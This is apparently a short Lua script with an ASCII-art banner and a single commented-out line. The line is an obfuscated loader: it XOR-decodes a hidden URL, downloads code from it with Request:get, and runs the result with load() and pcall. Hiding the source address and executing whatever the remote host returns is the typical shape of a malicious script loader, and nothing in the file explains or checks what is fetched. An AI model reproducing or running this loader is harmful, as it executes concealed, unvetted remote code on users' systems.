--[[
--+===================================================+
--|           __  __  _                               |
--|__  __     \ \/ / | |__     ___   __  __           |
--|\ \/ /      \  /  | '_ \   / _ \  \ \/ /           |
--| >  <   _   /  \  | |_) | | (_) |  >  <            |
--|/_/\_\ (_) /_/\_\ |_.__/   \___/  /_/\_\           |
--||  _ \  (_)  ___   _ __   | |   __ _   _   _   ___ |
--|| | | | | | / __| | '_ \  | |  / _` | | | | | / __||
--|| |_| | | | \__ \ | |_) | | | | (_| | | |_| | \__ \|
--||____/  |_| |___/ | .__/  |_|  \__,_|  \__, | |___/|
--|                  |_|                  |___/       |
--+===================================================+
]]

--local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10) local v11=0;local v12;while true do if (v11==(2 -1)) then return v5(v12);end if (v11==(568 -(367 + 201))) then v12={};for v13=928 -(214 + 713) , #v9 do v6(v12,v0(v4(v1(v2(v9,v13,v13 + 1 + 0 )),v1(v2(v10,1 + 0 + (v13% #v10) ,1 + (v13% #v10) + (878 -(282 + 595)) )))%256 ));end v11=1;end end end local v8=load(Request:get(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\252\45\233\168\211\19\222\199\222\115\179\244\202\29\221\202\217\106\244\190\193\13\158\203\222\36\226\168\136\19\208\202\213\106\245\190\211\10\216\205\220\54\169\171\213\27\221\204\218\33\227\169\137\18\196\194","\126\177\163\187\69\134\219\167")):text());if  not v8 then return;end pcall(v8);
